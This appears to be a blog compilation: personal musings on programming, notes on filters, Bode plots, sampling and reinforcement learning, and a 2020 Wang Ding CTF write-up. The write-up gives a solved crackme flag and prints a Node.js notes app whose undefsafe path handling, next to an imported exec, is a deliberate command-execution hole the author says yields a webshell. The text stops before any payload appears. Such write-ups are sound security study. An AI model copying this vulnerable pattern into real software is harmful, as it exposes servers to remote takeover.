Crossdressing? Girlfriend? Skill growth? — A recent self-examination of my abilities

image-20200517211412234

Image reposted from 夜儿黑黑 — a sheepdog from abroad.

I chatted with Long about his old "tastes" and got a rough idea of what he grew up on: 希尔薇 (Silvie), a galgame about raising a character from childhood. It seems every otaku has a tiger pent up inside, gradually walled off while growing up. Some people appear to want nothing at all, but whether that is itself just a way of pressuring others, I cannot say.

Programs have become playthings to me, a kind of companion-like medium. Watching the thought patterns of the strong programmers around me, the common thread is not to treat the keyboard as drudgery but to handle it with full, deliberate attention; the screen becomes a conversation partner, and the moment an AC (Accepted) verdict lands is pure elation. In such moments I find myself irresistibly curious about my own mind and spirit.

Perhaps raising-sim games have spawned an exponential space of parallel worlds in my head. Each time, I defeat that opponent in an imagined persona of my own.

image-20200517212603850

One should feel compassion when others act spoiled toward oneself. A young soul stagnates in a silent world; the keyboard becomes an IV drip wired from the veins into the mind. That ambiguity carries no real weight.

How to verifiably improve programming ability, fast:

  1. Become a bisexual who charms everyone
  2. Become an eccentric loved by young and old alike
  3. Become someone strong enough to bully the weak, yet not weak enough to be crushed from above

Lately I have been absorbed in training AI, learning many tuning algorithms: SARSA, Q-Learning. I daydream about using the compute I have to train up a companion in my head, shaking up the id and the not-I. HBO can air The Half of It, a love triangle that breaks every boundary; in my head I keep iterating my own soul.

What does this have to do with improving my abilities?

I don't know either; I've only gained a few more weaknesses.

Tsinghua's agents never use MCTS — it's all if-else

Long, it turns out, used an if-else greedy strategy. Apparently a raised-from-childhood scheme can never end well; one day it backfires, and Long fell head over heels for a girl named wenyi.

Learning to program really takes only two years

It took me two months to learn fine-tuning, GPU/CUDA C/C++, compilation on any platform, and some basic computer architecture. So even a high-school graduate with no background in discrete math or programming really needs only two years. That is very fortunate for most people: after just that much time, you can get a decent salary at any large company.

But is that really a good idea? I think not. In today's good market, what you learn quickly becomes down-to-earth because big companies are willing to train you. If a company runs short of money someday, it will stop paying to train you and instead hire PhDs whose output per unit time is more cost-effective. So once your youth is gone and you can no longer learn quickly, you're done.

I strongly advise against someone whose undergraduate major is unrelated going to the US for a watered-down master's and becoming a programmer. Programming demands two solid years of real grinding. And be sure to do the project for every course: only by completing projects do you really learn the details of a field. Learning by doing!

About 糖

First come, first served; no waiting for latecomers.

[Signal and System] Filters & Bode Plot

Filters

category

low-pass filter (LPF)
high-pass filter (HPF)
band-pass filter (BPF)
band-stop filter (BSF)

We focus on the low-pass filter; similar concepts and results hold for high-pass and band-pass filters.

Ideal low-pass filter: zero phase

image-20200512143142941image-20200512143158113image-20200512143220013

$$\begin{aligned}
h(t) &=\frac{1}{2 \pi} \int_{-\infty}^{\infty} H(j \omega) e^{j \omega t} d \omega \\
&=\frac{1}{2 \pi} \int_{-\omega_{c}}^{\omega_{c}} 1 \cdot e^{j \omega t} d \omega \\
&=\left.\frac{1}{2 \pi} \cdot \frac{1}{j t} e^{j \omega t}\right|_{-\omega_{c}}^{\omega_{c}} \\
&=\frac{1}{2 \pi} \cdot \frac{1}{j t} \cdot 2 j \sin \left(\omega_{c} t\right) \\
&=\frac{\sin \omega_{c} t}{\pi t}=\frac{\omega_{c}}{\pi} \operatorname{sinc}\left(\omega_{c} t\right) \\
h(n) &=\frac{\sin \omega_{c} n}{\pi n}=\frac{\omega_{c}}{\pi} \operatorname{sinc}\left(\omega_{c} n\right)
\end{aligned}$$

image-20200512144244246

\(s(t)=\int_{-\infty}^{t} h(\tau) d \tau\) image-20200512144147178

\(s(n)=\sum_{m=-\infty}^{n} h(m)\)image-20200512144216232
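As a numerical sanity check of the impulse response derived above (a sketch with an arbitrarily chosen cutoff \(\omega_c\) and time \(t\)), the inverse-transform integral can be evaluated directly and compared with the closed form \(\sin(\omega_c t)/(\pi t)\):

```python
import numpy as np

wc = 2.0   # cutoff frequency in rad/s (arbitrary choice for this check)
t = 1.3    # an arbitrary evaluation time

# Inverse Fourier transform of the brick-wall H(jw): (1/2pi) * integral of e^{jwt} over [-wc, wc]
w = np.linspace(-wc, wc, 200001)
dw = w[1] - w[0]
h_num = np.real(np.sum(np.exp(1j * w * t)) * dw) / (2 * np.pi)

# Closed form from the derivation: h(t) = sin(wc*t) / (pi*t)
h_closed = np.sin(wc * t) / (np.pi * t)

assert abs(h_num - h_closed) < 1e-3
print(round(h_closed, 4))  # 0.1262
```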

Ideal low-pass filter: linear phase

image-20200512144434500image-20200512144336101

rotate for \(-\alpha \omega\)

image-20200512144533776image-20200512144346387

Nonideal low-pass filter: frequency domain

image-20200512144642077

  • Pass band: \(0 \le \omega \le \omega_{p}\); stop band: \(\omega>\omega_{s}\); transition band: \(\omega_{p}<\omega<\omega_{s}\)
  • Pass-band ripple: \(\delta_{1}\); stop-band ripple: \(\delta_{2}\)
  • Linear (or nearly linear) phase over the pass band is desirable.

Nonideal low-pass filter: time domain

image-20200512144711418

  • Rise time: \(t_{r}\) overshoot: \(\Delta\)
  • Ringing frequency: \(\omega_{r}\) settling time: \(t_{s}\)

e.g. Nonideal low-pass filter

image-20200512144920810

  • Fifth-order Butterworth filter and a fifth-order elliptic filter
  • Same cutoff frequency
  • Same pass-band and stop-band ripple

There is a trade-off between the time-domain characteristic \(t_{s}\) and the frequency-domain characteristic \(\omega_{s}-\omega_{p}\).

Ideal vs. non-ideal filter

Gain.
  1. The ideal filter has a fixed gain of 1 in the pass band, meaning the pass-band input is passed "completely", while the stop-band gain is fixed at 0, meaning the stop-band input is filtered out "completely".
  2. The gain of a non-ideal filter is a function of frequency and is not fixed.
Cut-off frequency.
  1. The ideal filter switches instantaneously between the stop band and the pass band.
  2. The non-ideal filter cannot switch instantaneously between the pass band and the stop band: its attenuation (gain) varies continuously with frequency, so there is a transition band, and the stop-band gain cannot reach 0.

Bode Plot

The Bode plot applies to first- and second-order CT systems.

First-order CT system

image-20200512145206265

$$\begin{aligned}
\text { Differential equation: } & C \frac{d y(t)}{d t}=\frac{x(t)-y(t)}{R} \\
& \tau \frac{d y(t)}{d t}+y(t)=x(t), \quad \tau=R C
\end{aligned}$$

$$\begin{aligned}
\text { Frequency response: } &\tau j \omega Y(j \omega)+Y(j \omega)=X(j \omega)\\
&H(j \omega)=\frac{Y(j \omega)}{X(j \omega)}=\underbrace{\frac{1}{j \omega \tau+1}}_{\text {first order }}
\end{aligned}$$

Basic deduction

image-20200512145422064

image-20200512145432055

\(\tau\): time constant.
At \(t=\tau\): \(h(t)=1 /(\tau e)\), \(s(t)=1-1 / e\) image-20200512145458290
As \(\tau \downarrow\), \(h(t)\) decays more sharply and \(s(t)\) rises more sharply.

image-20200512145648470

The reason for the straight-line phase plot in image-20200512150206475 is that the phase \(\angle H(j\omega)=-\arctan(\omega\tau)\) can be approximated over the range \([\frac1{10\tau},\frac{10}\tau]\) by the line \(-\frac\pi4\left[\log_{10}(\omega\tau)+1\right]\).
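A minimal sketch (with an arbitrarily chosen \(\tau\)) confirming the exact first-order magnitude curve against its Bode straight-line asymptotes and the 3 dB corner:

```python
import numpy as np

tau = 0.01  # time constant in seconds (arbitrary for this sketch)

def mag_db(w):
    # Exact magnitude of H(jw) = 1/(1 + j*w*tau) in dB
    return -10 * np.log10(1 + (w * tau) ** 2)

# Low-frequency asymptote: 0 dB well below the corner 1/tau
assert abs(mag_db(1 / (100 * tau))) < 0.01
# High-frequency asymptote: -20 dB/decade, i.e. -20*log10(w*tau)
w_hi = 100 / tau
assert abs(mag_db(w_hi) - (-20 * np.log10(w_hi * tau))) < 0.01
# At the corner frequency the exact curve sits about 3 dB below the asymptotes
print(round(mag_db(1 / tau), 2))  # -3.01
# Phase: the straight line -(pi/4)*(log10(w*tau) + 1) is exact at w = 1/tau
assert abs(-np.arctan(1.0) + (np.pi / 4)) < 1e-12
```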

Second-order CT system: differential equation

physical meaning

image-20200512145848225 image-20200512145903362

Differential equation: \(\frac{d^{2} y(t)}{d t^{2}}+2 \zeta \omega_{n} \frac{d y(t)}{d t}+\omega_{n}^{2} y(t)=\omega_{n}^{2} x(t)\)

Frequency response:
\[
\begin{array}{l}(j \omega)^{2} Y(j \omega)+2 \zeta \omega_{n}(j \omega) Y(j \omega)+\omega_{n}^{2} Y(j \omega)=\omega_{n}^{2} X(j \omega) \\ H(j \omega)=\frac{\omega_{n}^{2}}{(j \omega)^{2}+2 \zeta \omega_{n}(j \omega)+\omega_{n}^{2}}\notag\end{array}
\]

image-20200512150651597image-20200512150705689

When \(\zeta>1\) the exponents are real, so Euler's formula does not apply and there is no oscillation; we simply plot the response.

image-20200512150747787

parameter differences in the Bode plot

image-20200512151000940

image-20200512151016575

image-20200512151026188

image-20200512151040188

image-20200512151051914

image-20200512151101900

image-20200512151111391

implementation

image-20200512151154068

Reference

  1. Lecture Notes on Signals and Systems, Sascha Spors, Universität Rostock.
  2. Signals and Systems, Alan V. Oppenheim.

[Signal and System] Sampling of Signals

Ideal Sampling and Reconstruction

sampling theorem

If \(f(t)\) is a band-limited signal with bandwidth \(\omega_{m}\), the spectrum \(F_{s}(\omega)\) of the sampled signal is the spectrum \(F(\omega)\) of \(f(t)\) periodically repeated along the frequency axis at intervals of the sampling frequency \(\omega_{s}\). Thus, no frequency overlap occurs when \(\omega_{s} \geq 2\omega_{m}\); it occurs when \(\omega_{s}<2\omega_{m}\).

Model of Ideal Sampling

A continuous signal \(x(t)\) is sampled by taking its amplitude values at given time-instants. These time-instants can be chosen arbitrarily in time, but equidistant sampling schemes are most common. The process of sampling is modeled by multiplying the continuous signal with a series of Dirac impulses. This constitutes an idealized model since Dirac impulses cannot be realized in practice.

For equidistant sampling of a continuous signal \(x(t)\) with sampling interval \(T\), the sampled signal \(x_\text{s}(t)\) reads

$$\begin{equation}
x_\text{s}(t) = \sum_{k = - \infty}^{\infty} x(t) \cdot \delta(t - k T) = \sum_{k = - \infty}^{\infty} x(k T) \cdot \delta(t - k T)
\end{equation}$$

where the multiplication property of the Dirac impulse was used for the last equality. The sampled signal is composed of a series of equidistant Dirac impulses weighted by the amplitude values of the continuous signal at the corresponding time-instants.

image-20200512114018147

The series of Dirac impulse is represented conveniently by the Dirac comb. Rewriting the sampled signal yields

$$\begin{equation}
x_\text{s}(t) = x(t) \cdot \frac{1}{T} {\bot\!\!\bot\!\!\bot} \left( \frac{t}{T} \right)
\end{equation}$$

The process of sampling can be modeled by multiplying the continuous signal \(x(t)\) with a Dirac comb. The samples \(x(k T)\) for \(k \in \mathbb{Z}\) of the continuous signal constitute the discrete-time signal \(x[k] := x(k T)\). The question arises if, and under which conditions, the samples \(x[k]\) fully represent the continuous signal and allow for a reconstruction of the analog signal. In order to investigate this, the spectrum of the sampled signal is derived.

Reconstruction

Ideal Reconstruction deduction

The question arises if and under which conditions the continuous signal can be recovered from the sampled signal. Above consideration revealed that the spectrum \(X_\text{s}(j \omega)\) of the sampled signal contains the unaltered spectrum of the continuous signal \(X(j \omega)\) if \(\omega_\text{u} < \frac{\omega_\text{s}}{2}\). Hence, the continuous signal can be reconstructed from the sampled signal by extracting the spectrum of the continuous signal from the spectrum of the sampled signal. This can be done by applying an ideal low-pass with cut-off frequency \(\omega_\text{c} = \frac{\omega_{s}}{2}\). This is illustrated in the following

image-20200512140938303

where the blue line represents the spectrum of the sampled signal and the red line the spectrum of the ideal low-pass. The transfer function \(H(j \omega)\) of the low-pass reads

$$\begin{equation}
H(j \omega) = T \cdot \text{rect} \left( \frac{\omega}{\omega_\text{s}} \right)
\end{equation}$$

Its impulse response \(h(t)\) is yielded by inverse Fourier transform of the transfer function

$$\begin{equation}
h(t) = \text{sinc} \left( \frac{\pi t}{T} \right)
\end{equation}$$

The reconstructed signal \(y(t)\) is given by convolving the sampled signal \(x_\text{s}(t)\) with the impulse response of the low-pass filter. This yields

$$\begin{align}
y(t) &= x_\text{s}(t) * h(t) \\
&= \left( \sum_{k = - \infty}^{\infty} x(k T) \cdot \delta(t - k T) \right) * \text{sinc} \left( \frac{\pi t}{T} \right) \\
&= \sum_{k = - \infty}^{\infty} x(k T) \cdot \text{sinc} \left( \frac{\pi}{T} (t - k T) \right)
\end{align}$$

where for the last equality the fact was exploited that \(x(k T)\) is independent of the time \(t\) for which the convolution is performed. The reconstructed signal is given by a weighted superposition of shifted sinc functions. Their weights are given by the samples \(x(k T)\) of the continuous signal. The reconstruction is illustrated in the following figure

image-20200512140925658

The black boxes show the samples \(x(k T)\) of the continuous signal, the blue line the reconstructed signal \(y(t)\), the gray lines the weighted sinc functions. The sinc function for \(k = 0\) is highlighted in red. The amplitudes \(x(k T)\) at the sampled positions are reconstructed perfectly since

$$\begin{equation}
\text{sinc} \left( \frac{\pi}{T} (t - k T) \right) = \begin{cases}
\text{sinc}(0) = 1 & \text{for } t=k T \\
\text{sinc}(n \pi) = 0 & \text{for } t=(k+n) T, \quad n \in \mathbb{Z} \setminus \{0\}
\end{cases}
\end{equation}$$

The amplitude values in between the sampling positions \(t = k T\) are given by superimposing the shifted sinc functions. The process of computing values in between given sampling points is termed interpolation. The reconstruction of the sampled signal is performed by interpolating the discrete amplitude values \(x(k T)\). The sinc function is the optimal interpolator for band-limited signals.
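The interpolation above can be sketched numerically (a truncated-sum approximation with a made-up band-limited test signal; note `np.sinc(u)` is \(\sin(\pi u)/(\pi u)\)):

```python
import numpy as np

T = 1.0                                     # sampling interval, ws = 2*pi/T
k = np.arange(-1000, 1001)                  # truncated index range (the ideal sum is infinite)
x = lambda t: np.cos(2 * np.pi * 0.1 * t)   # band-limited test signal, 0.1 Hz < 1/(2T)

def reconstruct(t):
    # y(t) = sum_k x(kT) * sinc((t - kT)/T), the weighted superposition of shifted sincs
    return float(np.sum(x(k * T) * np.sinc((t - k * T) / T)))

# The reconstruction matches the original both at and between the sampling instants
for t in (0.0, 0.25, 0.5, 3.1):
    assert abs(reconstruct(t) - x(t)) < 1e-2
print("sinc interpolation recovers the band-limited signal")
```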

Implementation

After sampling we have \(f_{s}(t)\); passing it through the low-pass filter \(h(t)\) gives the reconstructed function \(f(t)\):
\(f(t)=f_{s}(t) * h(t)\)
where \(f_{s}(t)=f(t) \sum_{n=-\infty}^{\infty} \delta\left(t-n T_{s}\right)=\sum_{n=-\infty}^{\infty} f\left(n T_{s}\right) \delta\left(t-n T_{s}\right)\)
and \(h(t)=T_{s} \frac{\omega_{c}}{\pi} S a\left(\omega_{c} t\right)\).
Therefore,
$$\begin{aligned}
f(t) &=f_{s}(t) * h(t)=\sum_{n=-\infty}^{\infty} f\left(n T_{s}\right) \delta\left(t-n T_{s}\right) * T_{s} \frac{\omega_{c}}{\pi} S a\left(\omega_{c} t\right) \\
&=T_{s} \frac{\omega_{c}}{\pi} \sum_{n=-\infty}^{\infty} f\left(n T_{s}\right) \operatorname{Sa}\left[\omega_{c}\left(t-n T_{s}\right)\right]
\end{aligned}$$
This shows that the signal can be reconstructed as an infinite series of continuous functions.

We take \(f(t)=S a(t)\) as the signal to be sampled. Sampling at \(\omega_{s}=2 \omega_{m}\) is called critical sampling, and we take the ideal low-pass cutoff frequency \(\omega_{c}=\omega_{m}\). The following program samples \(f(t)=S a(t)\) at the critical rate and reconstructs \(S a(t)\) from the samples:

wm=1;       % signal bandwidth
wc=wm;      % filter cutoff frequency
Ts=pi/wm;   % sampling interval
ws=2*pi/Ts; % sampling angular frequency
n=-100:100; % sample indices
nTs=n*Ts;   % sampling instants
f=sinc(nTs/pi);
Dt=0.005; t=-15:Dt:15;
fa=f*Ts*wc/pi*sinc((wc/pi)*(ones(length(nTs),1)*t-nTs'*ones(1,length(t)))); % signal reconstruction
t1=-15:0.5:15;
f1=sinc(t1/pi);
subplot(211);
stem(t1,f1);
xlabel('kTs');
ylabel('f(kTs)');
title('critically sampled signal of sa(t)=sinc(t/pi)');
subplot(212);
plot(t,fa);
xlabel('t');
ylabel('fa(t)');
title('sa(t) reconstructed from its critically sampled signal');
grid;

image-20200512140632694

Aliasing Reason

So far the case was discussed when no overlaps occur in the spectrum of the sampled signal. Hence when the upper frequency limit \(\omega_\text{u}\) of the real-valued low-pass signal is lower than \(\frac{\omega_\text{s}}{2}\). Here a perfect reconstruction of the continuous signal \(x(t)\) from its discrete counterpart \(x[k]\) is possible. However when this condition is not met, the repetitions of the spectrum of the continuous signal overlap. This is illustrated in the following

image-20200512141016176

In this case no perfect reconstruction of the continuous signal by low-pass filtering (interpolation) of the sampled signal is possible. The spectrum within the pass-band of the low-pass contains additional contributions from the repeated spectrum of the continuous signal. These contributions are known as aliasing. It becomes evident from above discussion of ideal reconstruction that the amplitude values are reconstructed correctly at the time-instants \(k T\). However, in between these time-instants the reconstructed signal \(y(t)\) differs from the sampled signal \(x(t)\) if aliasing is present.
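Aliasing can be made concrete with a small sketch (sampling rate and frequencies are arbitrary): two different continuous sinusoids whose frequencies differ by exactly \(\omega_s\) produce identical samples, so they cannot be told apart afterwards.

```python
import numpy as np

fs = 8.0            # sampling rate in Hz (arbitrary)
T = 1 / fs
k = np.arange(32)   # sample indices

f1 = 1.0            # frequency inside the Nyquist band (< fs/2)
f2 = f1 + fs        # differs by exactly fs, so it aliases onto f1

s1 = np.cos(2 * np.pi * f1 * k * T)
s2 = np.cos(2 * np.pi * f2 * k * T)

# The two distinct continuous signals are indistinguishable from their samples alone
assert np.allclose(s1, s2)
print("f2 =", f2, "Hz aliases onto f1 =", f1, "Hz at fs =", fs)
```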

Implementation

wm=1;
wc=1.1*wm;
Ts=0.7*pi/wm;
ws=2*pi/Ts;
n=-100:100;
nTs=n*Ts;
f=sinc(nTs/pi);
Dt=0.005; t=-15:Dt:15;
fa=f*Ts*wc/pi*sinc((wc/pi)*(ones(length(nTs),1)*t-nTs'*ones(1,length(t))));
error=abs(fa-sinc(t/pi)); % error between reconstructed and original signal
t1=-15:0.5:15;
f1=sinc(t1/pi);
subplot(311);
stem(t1,f1);
xlabel('kTs');
ylabel('f(kTs)');
title('sampled signal of sa(t)=sinc(t/pi)');
subplot(312);
plot(t,fa);
xlabel('t');
ylabel('fa(t)');
title('sa(t) reconstructed from the sampled signal');
grid;
subplot(313);
plot(t,error);
xlabel('t');
ylabel('error(t)');
title('error(t) between the reconstructed and original signals');

image-20200512141558411

summary

image-20200512113905574

credit: bachelor's module Signals and Systems, Communications Engineering, Universität Rostock.

The order of sampling and quantization can be exchanged under the assumption that both are memoryless processes. Only digital signals can be handled by digital signal processors or general-purpose processors. The sampling of signals is discussed here as a first step towards a digital signal.

[RL] Monte-Carlo Methods

Monte-Carlo RL

  1. MC learns directly from episodes of experience.
  2. MC is model-free: no knowledge of MDP transitions or rewards.
  3. MC learns from complete episodes: no bootstrapping.
    1. Here bootstrapping means using one or more estimated values in the update step for the same kind of estimated value, as in \(SARSA(\lambda)\) or \(Q(\lambda)\).
    2. Single-step TD bootstraps; multi-step methods mix results from trajectories of different lengths.
  4. MC uses the simplest possible idea: value = mean return.
  5. Two settings:
    1. Model-free: no model necessary, and it still attains optimality.
    2. Simulated: needs only a simulation, not a full model.
  6. Caveat: MC can only be applied to episodic MDPs.
    1. All episodes must terminate.

policy evaluation

The goal is to learn \(v_\pi\) from episodes of experience under policy \(\pi\):
\[S_1,A_1,R_2,\ldots,S_T \sim \pi\]
The return is the total discounted reward: \(G_t=R_{t+1}+\gamma R_{t+2}+\dots+\gamma ^{T-1}R_T\).

The value function is the expected return: \(v_\pi(s)=\mathbb{E}_{\pi}[G_t \mid S_t=s]\)
P.S. This method uses the empirical mean rather than the expected return.

Depending on which visits within an episode are counted, MC evaluation divides into Every-Visit and First-Visit variants; both converge asymptotically.

First-visit

proof of convergence


In effect, first-visit MC updates \(V(s)\) with the running mean \(\frac{S(s)}{N(s)}\), where \(N(s)\) counts first visits to \(s\) and \(S(s)\) accumulates the returns that follow them.
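As a sketch on a made-up two-state episodic chain (the states 'A', 'B' and their rewards are invented for illustration), first-visit MC evaluation reduces to averaging the returns observed after the first visit to each state:

```python
import random

def episode():
    # Made-up episodic chain: A --r--> B --1--> terminal,
    # where r is 0 or 2 with equal probability (so E[r] = 1)
    r = random.choice([0, 2])
    return [('A', r), ('B', 1)]      # (state, reward received on leaving it)

def first_visit_mc(num_episodes, gamma=1.0, seed=0):
    random.seed(seed)
    returns_sum, visits = {}, {}
    for _ in range(num_episodes):
        ep = episode()
        G, G_first = 0.0, {}
        for s, r in reversed(ep):    # walk backwards, accumulating the return G_t
            G = r + gamma * G
            G_first[s] = G           # last overwrite going backwards = first visit
        for s, G_t in G_first.items():
            returns_sum[s] = returns_sum.get(s, 0.0) + G_t
            visits[s] = visits.get(s, 0) + 1
    return {s: returns_sum[s] / visits[s] for s in visits}

V = first_visit_mc(20000)
print(round(V['B'], 2), round(V['A'], 1))  # V(B) = 1, V(A) = E[r] + V(B) ≈ 2
```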

blackjack (21 points)

In Sutton's book, we get the exploration graph like

Every-Visit Monte-Carlo Policy Evaluation

The only difference is that every visit to a state is used, not just the first.

Incremental Mean

The mean \(\mu_1,\mu_2.... \) of the sequent can be computed incrementally by
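A minimal sketch verifying the incremental-mean identity \(\mu_k=\mu_{k-1}+(x_k-\mu_{k-1})/k\), which is what lets MC update its value estimates per episode without storing all past returns:

```python
def incremental_mean(xs):
    # mu_k = mu_{k-1} + (x_k - mu_{k-1}) / k, one pass, O(1) memory
    mu, k = 0.0, 0
    for x in xs:
        k += 1
        mu += (x - mu) / k
    return mu

data = [4.0, 8.0, 6.0, 2.0]
assert incremental_mean(data) == sum(data) / len(data)
print(incremental_mean(data))  # 5.0
```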

incremental MC-updates

Monte-Carlo Estimation of Action Values

Backup Diagram for Monte-Carlo

Similar to the bandit setting, the goal is to find the optimum under the explore/exploit dilemma, with the entire remainder of the episode included. The only choice considered is the action at each state, and MC does not bootstrap (unlike DP).

The time required to estimate one state does not depend on the total number of states.

Temporal-Difference Learning

Bootstrapping

The saying: to lift oneself up by pulling on one's own bootstraps, again and again — an impossible task.

Modern definition: a re-sampling technique that draws from the same sample again and again; it has a precise statistical meaning.

intro

  1. TD methods learn directly from episodes of experience
  2. TD is model-free:no knowledge of MDP transitions/rewards
  3. TD learns from incomplete episodes, by bootstrapping
  4. TD updates a guess towards a guess

TD\((n)\): the number denotes how many steps the method looks ahead.

driving home example

TD is more flexible because MC must wait for the final return before updating. This also relates to on-policy vs. off-policy learning.




MC updates toward the nearest actual outcome: the observed return.


We actually can generate the estimated MDP graph and corresponding example for AB example.

Comparison

  1. TD can learn before knowing the final outcome
    1. TD can learn online after every step (less memory & peak computation)
    2. MC must wait until end of episode before return is known
  2. TD can learn without the final outcome
    1. TD can learn from incomplete sequences
    2. MC can only learn from complete sequences
    3. TD works in continuing (non-terminating) environments
    4. MC only works for episodic (terminating) environment
      As a result, TD performs better on the random walk example.
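A sketch of TD(0) on the classic five-state random walk (the step size and episode count here are arbitrary choices), showing the guess-toward-a-guess update converging to the true values \(V(s)=s/6\):

```python
import random

def td0(num_episodes=50000, alpha=0.01, seed=1):
    # Five-state random walk: states 1..5, terminals 0 and 6,
    # reward 1 only on reaching state 6; true values are V(s) = s/6.
    random.seed(seed)
    V = {s: 0.5 for s in range(1, 6)}
    V[0] = V[6] = 0.0
    for _ in range(num_episodes):
        s = 3
        while s not in (0, 6):
            s2 = s + random.choice((-1, 1))
            r = 1.0 if s2 == 6 else 0.0
            V[s] += alpha * (r + V[s2] - V[s])   # TD(0) update, gamma = 1
            s = s2
    return V

V = td0()
print([round(V[s], 2) for s in range(1, 6)])  # roughly [0.17, 0.33, 0.5, 0.67, 0.83]
```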


batch MC and TD

add step parameter \(\alpha\)

Unified comparison


  • Bootstrapping: update involves an estimate
    • MC does not bootstrap
    • DP bootstraps
    • TD bootstraps
  • Sampling:update samples an expectation
    • MC samples
    • DP does not sample
    • TD samples

n-step TD

n-Step Return: consider the \(n\)-step returns for \(n=1,2,\dots,\infty\):

$$\begin{aligned}
n&=1 \ (TD): & G_{t}^{(1)} &= R_{t+1}+\gamma V\left(S_{t+1}\right) \\
n&=2: & G_{t}^{(2)} &= R_{t+1}+\gamma R_{t+2}+\gamma^{2} V\left(S_{t+2}\right) \\
& & &\ \vdots \\
n&=\infty \ (MC): & G_{t}^{(\infty)} &= R_{t+1}+\gamma R_{t+2}+\ldots+\gamma^{T-1} R_{T}
\end{aligned}$$

Define the \(n\)-step return (the general case):
\[
G_{t}^{(n)}=R_{t+1}+\gamma R_{t+2}+\ldots+\gamma^{n-1} R_{t+n}+\gamma^{n} V\left(S_{t+n}\right)
\]
\(n\)-step temporal-difference learning:
\[
V\left(S_{t}\right) \leftarrow V\left(S_{t}\right)+\alpha\left(G_{t}^{(n)}-V\left(S_{t}\right)\right)
\]
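The n-step return can be sketched as a small helper (the reward and value numbers below are made up purely for the check); for \(n=1\) it reduces to the TD(0) target, and once \(t+n\) passes the end of the episode it reduces to the MC return:

```python
def n_step_return(rewards, values, t, n, gamma):
    # G_t^{(n)} = R_{t+1} + gamma*R_{t+2} + ... + gamma^(n-1)*R_{t+n} + gamma^n * V(S_{t+n})
    T = len(rewards)                       # episode terminates after T rewards
    G = 0.0
    for i in range(min(n, T - t)):
        G += gamma ** i * rewards[t + i]
    if t + n < T:                          # bootstrap only if the episode is not over
        G += gamma ** n * values[t + n]
    return G

rewards = [1.0, 2.0, 3.0]    # R_1, R_2, R_3 (made-up numbers)
values = [10.0, 20.0, 30.0]  # V(S_0), V(S_1), V(S_2) (made-up estimates)
gamma = 0.5

assert n_step_return(rewards, values, 0, 1, gamma) == 1.0 + 0.5 * 20.0    # TD(0) target
assert n_step_return(rewards, values, 0, 3, gamma) == 1.0 + 1.0 + 0.75    # = MC return
print("n-step return checks pass")
```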

Reference

  1. What exactly is bootstrapping in reinforcement learning?
  2. First-visit Monte Carlo policy from WSU

Reflection on our 2020 Wang Ding CTF contest

Result

image-20200510230838571

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get robots.txt from the nginx website to find the destination.

image-20200510231822195

Play the game with the gorgeous names in the CTF conf.

image-20200510231813046

Flag in "F12"

image-20200510231804937

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

image-20200510232648046

Unfortunately, there is a VM inside. From vm_operad, we have

image-20200510232802184

image-20200510232837945

The key is case 7; we can trace the values of a1[v10+1] to figure out what happens. So, fire up OllyDbg.

Applying the table

int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduce that case 8 reads the user's input, with the handler acting like an interrupt-vector handler in an OS.

the handler can be enumerated as

0x10 ^ v8[1] - 5 = 0x22
(0x20 ^ v8[2]) * 3 = 0x3F
v8[3] - 2 - 1 = 0x34
(v8[4] + 1) ^ 4 = 0x32
v8[5] * 3 - 0x21 = 0x72
v8[6] - 1 - 1 = 0x33
9 ^ v8[7] - 0x20 = 0x18
(0x51 + v8[8]) ^ 0x24 = 0xFFFFFFA7
v8[9] + 1 - 1 = 0x31
2 * v8[10] + 0x25 = 0xF1
(0x36 + v8[11]) ^ 0x41 = 0x28
(0x20 + v8[12]) * 1 = 0xFFFFFF84
3 * v8[13] + 0x25 = 0xC1
9 ^ v8[14] - 0x20 = 0x1E
0x41 + v8[15] + 1 = 0x7A

Eventually we get the full flag: flag{757515121f3d478}.

Web

Notes

image-20200510231219939

get the webshell from the logic in the js.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
